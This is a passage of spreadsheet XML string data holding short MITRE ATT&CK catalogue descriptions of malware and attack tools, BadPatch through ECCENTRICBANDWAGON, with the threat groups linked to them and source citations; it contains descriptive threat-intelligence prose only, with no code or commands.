    <t>[BadPatch](https://attack.mitre.org/software/S0337) is a Windows Trojan that was used in a Gaza Hackers-linked campaign.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) is a commercially available RAT, written in Delphi and C++, that has been available since at least 2007. It has been used against government, financial, energy, healthcare, education, IT, and legal organizations in the US, South America, Europe, and Southeast Asia. [Bandook](https://attack.mitre.org/software/S0234) has been used by [Dark Caracal](https://attack.mitre.org/groups/G0070), as well as in a separate campaign referred to as "Operation Manul".(Citation: EFF Manul Aug 2016)(Citation: Lookout Dark Caracal Jan 2018)(Citation: CheckPoint Bandook Nov 2020)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, [Lazarus Group](https://attack.mitre.org/groups/G0032) used the [Bankshot](https://attack.mitre.org/software/S0239) implant in attacks against the Turkish financial sector. (Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. [Bazar](https://attack.mitre.org/software/S0534) reportedly has ties to [TrickBot](https://attack.mitre.org/software/S0266) campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) is an x64 shellcode for a stage-zero implant designed to download malware from a C2 server. First discovered in August 2020, [BendyBear](https://attack.mitre.org/software/S0574) shares a variety of features with [Waterbear](https://attack.mitre.org/software/S0579), malware previously attributed to the Chinese cyber espionage group [BlackTech](https://attack.mitre.org/groups/G0098).(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) is a remote access tool (RAT) that has been used by [Tonto Team](https://attack.mitre.org/groups/G0131) against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. [BitPaymer](https://attack.mitre.org/software/S0570) uses a unique encryption key, ransom note, and contact information for each operation. [BitPaymer](https://attack.mitre.org/software/S0570) has several indicators suggesting overlap with the [Dridex](https://attack.mitre.org/software/S0384) malware and is often delivered via [Dridex](https://attack.mitre.org/software/S0384).(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. (Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) is a web shell based on [China Chopper](https://attack.mitre.org/software/S0020) for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by [GALLIUM](https://attack.mitre.org/groups/G0093) against telecommunication providers.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.(Citation: GitHub Bloodhound)(Citation: CrowdStrike BloodHound April 2018)(Citation: FoxIT Wocao December 2019)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) is a malicious version of OpenSSH which acts as a custom backdoor. [Bonadan](https://attack.mitre.org/software/S0486) has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) is a downloader responsible for executing next stage components that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[BoxCaon](https://attack.mitre.org/software/S0651) is a Windows backdoor that was used by [IndigoZebra](https://attack.mitre.org/groups/G0136) in a 2021 spearphishing campaign against Afghan government officials. [BoxCaon](https://attack.mitre.org/software/S0651)'s name stems from similarities shared with the malware family [xCaon](https://attack.mitre.org/software/S0653).(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to [Gold Dragon](https://attack.mitre.org/software/S0249), and was seen along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations surrounding the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor and download files on to compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t xml:space="preserve">[Bumblebee](https://attack.mitre.org/software/S1039) is a custom loader written in C++ that has been used by multiple threat actors, including possible initial access brokers, to download and execute additional payloads since at least March 2022. [Bumblebee](https://attack.mitre.org/software/S1039) has been linked to ransomware operations including [Conti](https://attack.mitre.org/software/S0575), Quantum, and Mountlocker and derived its name from the appearance of "bumblebee" in the user-agent.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)
</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) is adware written for macOS that has been in use since at least 2015. Though categorized as adware, [Bundlore](https://attack.mitre.org/software/S0482) has many features associated with more traditional backdoors.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[CALENDAR](https://attack.mitre.org/software/S0025) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Gmail Calendar traffic. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) is an FTP downloader utility that has been in use since at least 2019. [CARROTBALL](https://attack.mitre.org/software/S0465) has been used as a downloader to install [SYSCON](https://attack.mitre.org/software/S0464).(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) is a customized dropper that has been in use since at least 2017. [CARROTBAT](https://attack.mitre.org/software/S0462) has been used to install [SYSCON](https://attack.mitre.org/software/S0464) and has infrastructure overlap with [KONNI](https://attack.mitre.org/software/S0356).(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CCBkdr](https://attack.mitre.org/software/S0222) is malware that was injected into a signed version of CCleaner and distributed from CCleaner's distribution website. (Citation: Talos CCleanup 2017) (Citation: Intezer Aurora Sept 2017)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) is a malware family of modular backdoors used by [APT28](https://attack.mitre.org/groups/G0007). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) (Citation: DOJ GRU Indictment Jul 2018) It is tracked separately from the [X-Agent for Android](https://attack.mitre.org/software/S0314).</t>
  </si>
  <si>
    <t>[CORALDECK](https://attack.mitre.org/software/S0212) is an exfiltration tool used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) is a downloader used by [APT28](https://attack.mitre.org/groups/G0007). The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.(Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)</t>
  </si>
  <si>
    <t>[CSPY Downloader](https://attack.mitre.org/software/S0527) is a tool designed to evade analysis and download additional payloads used by [Kimsuky](https://attack.mitre.org/groups/G0094).(Citation: Cybereason Kimsuky November 2020)</t>
  </si>
  <si>
    <t>[Cachedump](https://attack.mitre.org/software/S0119) is a publicly-available tool that program extracts cached password hashes from a system’s registry. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[CaddyWiper](https://attack.mitre.org/software/S0693) is a destructive data wiper that has been used in attacks against organizations in Ukraine since at least March 2022.(Citation: ESET CaddyWiper March 2022)(Citation: Cisco CaddyWiper March 2022)</t>
  </si>
  <si>
    <t>[Cadelspy](https://attack.mitre.org/software/S0454) is a backdoor that has been used by [APT39](https://attack.mitre.org/groups/G0087).(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[Calisto](https://attack.mitre.org/software/S0274) is a macOS Trojan that opens a backdoor on the compromised machine. [Calisto](https://attack.mitre.org/software/S0274) is believed to have first been developed in 2016. (Citation: Securelist Calisto July 2018) (Citation: Symantec Calisto July 2018)</t>
  </si>
  <si>
    <t>[CallMe](https://attack.mitre.org/software/S0077) is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[Cannon](https://attack.mitre.org/software/S0351) is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. (Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/software/S0030) is a full-featured, remote backdoor used by a group of the same name ([Carbanak](https://attack.mitre.org/groups/G0008)). It is intended for espionage, data exfiltration, and providing remote access to infected machines. (Citation: Kaspersky Carbanak) (Citation: FireEye CARBANAK June 2017)</t>
  </si>
  <si>
    <t>[Carberp](https://attack.mitre.org/software/S0484) is a credential and information stealing malware that has been active since at least 2009. [Carberp](https://attack.mitre.org/software/S0484)'s source code was leaked online in 2013, and subsequently used as the foundation for the [Carbanak](https://attack.mitre.org/software/S0030) backdoor.(Citation: Trend Micro Carberp February 2014)(Citation: KasperskyCarbanak)(Citation: RSA Carbanak November 2017)</t>
  </si>
  <si>
    <t>[Carbon](https://attack.mitre.org/software/S0335) is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. [Carbon](https://attack.mitre.org/software/S0335) has been selectively used by [Turla](https://attack.mitre.org/groups/G0010) to target government and foreign affairs-related organizations in Central Asia.(Citation: ESET Carbon Mar 2017)(Citation: Securelist Turla Oct 2018)</t>
  </si>
  <si>
    <t>[Cardinal RAT](https://attack.mitre.org/software/S0348) is a potentially low volume remote access trojan (RAT) observed since December 2015. [Cardinal RAT](https://attack.mitre.org/software/S0348) is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler.(Citation: PaloAlto CardinalRat Apr 2017)</t>
  </si>
  <si>
    <t>[Catchamas](https://attack.mitre.org/software/S0261) is a Windows Trojan that steals information from compromised systems. (Citation: Symantec Catchamas April 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) is a self-developed Web Shell tool created by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123).(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) is a Trojan that appears to be used exclusively by [menuPass](https://attack.mitre.org/groups/G0045). It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. (Citation: Palo Alto menuPass Feb 2017) (Citation: JPCERT ChChes Feb 2017) (Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) is a multistage information stealer written in several programming languages that collects login credentials, credit card numbers, and other financial information. [Chaes](https://attack.mitre.org/software/S0631) was first observed in 2020, and appears to primarily target victims in Brazil as well as other e-commerce customers in Latin America.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>[Chaos](https://attack.mitre.org/software/S0220) is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets. (Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) is a PowerShell-based, modular backdoor that has been used by [Magic Hound](https://attack.mitre.org/groups/G0059) since at least 2022.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[Cherry Picker](https://attack.mitre.org/software/S0107) is a point of sale (PoS) memory scraper. (Citation: Trustwave Cherry Picker)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Chinoxy](https://attack.mitre.org/software/S1041) is a backdoor that has been used since at least November 2018, during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign, to gain persistence and drop additional payloads. According to security researchers, [Chinoxy](https://attack.mitre.org/software/S1041) has been used by Chinese-speaking threat actors.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) is a backdoor tool written using the Microsoft Foundation Class (MFC) framework that was first reported in June 2021; security researchers noted infrastructure overlaps with [Gelsemium](https://attack.mitre.org/software/S0666) malware.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) is a modular backdoor written in C++ that has been used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2017.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Clop](https://attack.mitre.org/software/S0611) is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. [Clop](https://attack.mitre.org/software/S0611) is a variant of the CryptoMix ransomware.(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)(Citation: Unit42 Clop April 2021) </t>
  </si>
  <si>
    <t>[CloudDuke](https://attack.mitre.org/software/S0054) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: F-Secure The Dukes) (Citation: Securelist Minidionis July 2015)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&amp;CK tactics, all executed within a single, integrated system.(Citation: cobaltstrike manual)
In addition to its own capabilities, [Cobalt Strike](https://attack.mitre.org/software/S0154) leverages the capabilities of other well-known tools such as Metasploit and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) is a backdoor, remote access tool that has been observed since 2016.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) is a second stage implant suspected of being a descendant of [Agent.btz](https://attack.mitre.org/software/S0092) and used by [Turla](https://attack.mitre.org/groups/G0010). The first version of [ComRAT](https://attack.mitre.org/software/S0126) was identified in 2007, but the tool has undergone substantial development for many years since.(Citation: Symantec Waterbug)(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) is a remote backdoor which has been used in attacks in East Asia. (Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.(Citation: SANS Conficker) In 2016, a variant of [Conficker](https://attack.mitre.org/software/S0608) made its way on computers and removable disk drives belonging to a nuclear power plant.(Citation: Conficker Nuclear Power Plant)</t>
  </si>
  <si>
    <t>[ConnectWise](https://attack.mitre.org/software/S0591) is a legitimate remote administration tool that has been used since at least 2016 by threat actors including [MuddyWater](https://attack.mitre.org/groups/G0069) and [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) to connect to and conduct lateral movement in target environments.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. [Conti](https://attack.mitre.org/software/S0575) has been deployed via [TrickBot](https://attack.mitre.org/software/S0266) and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://attack.mitre.org/software/S0575) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) is mac-based malware that targets information associated with cryptocurrency exchanges as well as enabling cryptocurrency mining on the victim system itself. It was first discovered in the wild in 2019.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CostaBricks](https://attack.mitre.org/software/S0614) is a loader that was used to deploy 32-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[CozyCar](https://attack.mitre.org/software/S0046) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CrackMapExec](https://attack.mitre.org/software/S0488), or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. [CrackMapExec](https://attack.mitre.org/software/S0488) collects Active Directory information to conduct lateral movement through targeted networks.(Citation: CME Github September 2018)</t>
  </si>
  <si>
    <t>[CreepyDrive](https://attack.mitre.org/software/S1023) is a custom implant has been used by [POLONIUM](https://attack.mitre.org/groups/G1005) since at least early 2022 for C2 with and exfiltration to actor-controlled OneDrive accounts.(Citation: Microsoft POLONIUM June 2022)
[POLONIUM](https://attack.mitre.org/groups/G1005) has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[CreepySnail](https://attack.mitre.org/software/S1024) is a custom PowerShell implant that has been used by [POLONIUM](https://attack.mitre.org/groups/G1005) since at least 2022.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) is a remote access Trojan that has been used by [Transparent Tribe](https://attack.mitre.org/groups/G0134) since at least 2016.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) is a cross platform RAT.</t>
  </si>
  <si>
    <t>[Crutch](https://attack.mitre.org/software/S0538) is a backdoor designed for document theft that has been used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2015.(Citation: ESET Crutch December 2020)</t>
  </si>
  <si>
    <t>[Cryptoistic](https://attack.mitre.org/software/S0498) is a backdoor, written in Swift, that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032).(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">
[Cuba](https://attack.mitre.org/software/S0625) is a Windows-based ransomware family that has been used against financial institutions, technology, and logistics organizations in North and South America as well as Europe since at least December 2019.(Citation: McAfee Cuba April 2021)</t>
  </si>
  <si>
    <t>[Cyclops Blink](https://attack.mitre.org/software/S0687) is a modular malware that has been used in widespread campaigns by [Sandworm Team](https://attack.mitre.org/groups/G0034) since at least 2019 to target Small/Home Office (SOHO) network devices, including WatchGuard and Asus.(Citation: NCSC Cyclops Blink February 2022)(Citation: NCSC CISA Cyclops Blink Advisory February 2022)(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>[DCSrv](https://attack.mitre.org/software/S1033) is destructive malware that has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) since at least  September 2021. Though [DCSrv](https://attack.mitre.org/software/S1033) has ransomware-like capabilities, [Moses Staff](https://attack.mitre.org/groups/G1009) does not demand ransom or offer a decryption key.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[DDKONG](https://attack.mitre.org/software/S0255) is a malware sample that was part of a campaign by [Rancor](https://attack.mitre.org/groups/G0075). [DDKONG](https://attack.mitre.org/software/S0255) was first seen used in February 2017. (Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[DEATHRANSOM](https://attack.mitre.org/software/S0616) is ransomware written in C that has been used since at least 2020, and has potential overlap with [FIVEHANDS](https://attack.mitre.org/software/S0618) and [HELLOKITTY](https://attack.mitre.org/software/S0617).(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[DRATzarus](https://attack.mitre.org/software/S0694) is a remote access tool (RAT) that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) to target the defense and aerospace organizations globally since at least summer 2020. [DRATzarus](https://attack.mitre.org/software/S0694) shares similarities with [Bankshot](https://attack.mitre.org/software/S0239), which was used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in 2017 to target the Turkish financial sector.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>[Dacls](https://attack.mitre.org/software/S0497) is a multi-platform remote access tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least December 2019.(Citation: TrendMicro macOS Dacls May 2020)(Citation: SentinelOne Lazarus macOS July 2020)</t>
  </si>
  <si>
    <t>[DanBot](https://attack.mitre.org/software/S1014) is a first-stage remote access Trojan written in C# that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least 2018.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>[DarkComet](https://attack.mitre.org/software/S0334) is a Windows remote administration tool and backdoor.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) is a lightweight JavaScript-based remote access tool (RAT) that avoids file operations; it was first observed in November 2021.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. (Citation: Trend Micro Daserf Nov 2017) (Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[DealersChoice](https://attack.mitre.org/software/S0243) is a Flash exploitation framework used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: Sofacy DealersChoice)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050). [Denis](https://attack.mitre.org/software/S0354) shares several similarities to the [SOUNDBITE](https://attack.mitre.org/software/S0157) backdoor and has been used in conjunction with the [Goopy](https://attack.mitre.org/software/S0477) backdoor.(Citation: Cybereason Oceanlotus May 2017)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups.(Citation: Novetta-Axiom)(Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. [Diavol](https://attack.mitre.org/software/S0659) has been deployed by [Bazar](https://attack.mitre.org/software/S0534) and is thought to have potential ties to [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Fortinet Diavol July 2021)(Citation: FBI Flash Diavol January 2022)(Citation: DFIR Diavol Ransomware December 2021)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) is a malware family of backdoors that appear to be used exclusively by [PLATINUM](https://attack.mitre.org/groups/G0068). (Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021) is a .NET based DNS backdoor, which is a customized version of the open source tool DIG.net, that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2022.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) is a Trojan application disguised as a .zip file that is able to collect user credentials and install a malicious proxy server to redirect a user's network traffic (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)).(Citation: objsee mac malware 2017)(Citation: hexed osx.dok analysis 2019)(Citation: CheckPoint Dok)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) is a backdoor that uses a unique Dogecoin-based Domain Generation Algorithm and was first observed in July 2020. [Doki](https://attack.mitre.org/software/S0600) was used in conjunction with the [Ngrok](https://attack.mitre.org/software/S0508) Mining Botnet in a campaign that targeted Docker servers in cloud platforms. (Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Donut](https://attack.mitre.org/software/S0695) is an open source framework used to generate position-independent shellcode.(Citation: Donut Github)(Citation: Introducing Donut) [Donut](https://attack.mitre.org/software/S0695) generated code has been used by multiple threat actors to inject and load malicious payloads into memory.(Citation: NCC Group WastedLocker June 2020)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) is a backdoor Trojan; its main functionality is to download and run second stage malware. (Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) is a first-stage downloader written in Delphi that has been used by [APT28](https://attack.mitre.org/groups/G0007) in rare instances between 2013 and 2015. (Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) is a prolific banking Trojan that first appeared in 2014. By December 2019, the US Treasury estimated [Dridex](https://attack.mitre.org/software/S0384) had infected computers in hundreds of banks and financial institutions in over 40 countries, leading to more than $100 million in theft. [Dridex](https://attack.mitre.org/software/S0384) was created from the source code of the Bugat banking Trojan (also known as Cridex).(Citation: Dell Dridex Oct 2015)(Citation: Kaspersky Dridex May 2017)(Citation: Treasury EvilCorp Dec 2019)</t>
  </si>
  <si>
    <t>[DropBook](https://attack.mitre.org/software/S0547) is a Python-based backdoor compiled with PyInstaller.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) is a Linux malware toolset comprised of an agent, client, server, and kernel modules, that has been used by [APT28](https://attack.mitre.org/groups/G0007).(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) is spyware that was discovered in 2019 and has been used against Indian financial institutions, research facilities, and the Kudankulam Nuclear Power Plant. [Dtrack](https://attack.mitre.org/software/S0567) shares similarities with the DarkSeoul campaign, which was attributed to [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: Kaspersky Dtrack)(Citation: Securelist Dtrack)(Citation: Dragos WASSONITE)(Citation: CyberBit Dtrack)(Citation: ZDNet Dtrack)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. (Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) is multi-stage malware written in .NET that has been used by [Molerats](https://attack.mitre.org/groups/G0021) since May 2015. (Citation: DustySky) (Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) is a banking Trojan that has been used for financial gain. 
 (Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) is a remote access Trojan (RAT) used by North Korean cyber actors that was first identified in August 2020. It is a reconnaissance tool--with keylogging and screen capture functionality--used for information gathering on compromised systems.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
